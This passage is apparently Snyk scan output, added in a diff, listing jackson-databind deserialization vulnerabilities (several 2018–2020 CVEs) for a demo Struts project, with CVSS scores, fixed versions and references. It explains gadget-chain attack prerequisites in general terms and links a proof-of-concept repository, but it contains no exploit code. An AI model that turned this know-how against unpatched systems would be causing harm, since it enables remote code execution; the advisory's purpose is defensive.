Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.45827", + "probability": "0.00116", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14439" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.478840Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:35.581531Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "className": "SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2814", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Kamimuka/cve-2020-24616-poc", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.282990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n", + "epssDetails": { + "percentile": "0.85138", + "probability": "0.01172", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24616" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-08-26T11:28:06.617646Z", + "functions_new": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-08-26T11:26:14Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-08-26T14:27:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:47.311633Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2052", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.496040Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n", + "epssDetails": { + "percentile": "0.81303", + "probability": "0.00770", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12022" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cjjf-94ff-43w7", + "GHSA-wrr7-33fx-rcvj" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:11:34.234921Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:00:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:00:03Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:36.643590Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2032", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:53.818908Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:14.962980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.624837Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-11307`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-14723`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/27b4defc270454dea6842bd9279f17387eceb737)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2032)\n", + "epssDetails": { + "percentile": "0.85803", + "probability": "0.01278", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-11307" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qr7j-h6gg-jmgc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:14:00.916831Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0, 2.8.11.2)", + "[2.9.0, 2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-10T17:10:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:10:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:26.624837Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2058", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 5.6, + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.092429Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:31.058577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:43.326081Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. This vulnerability is due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12023`) is not identical to `CVE-2018-12018`, `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not 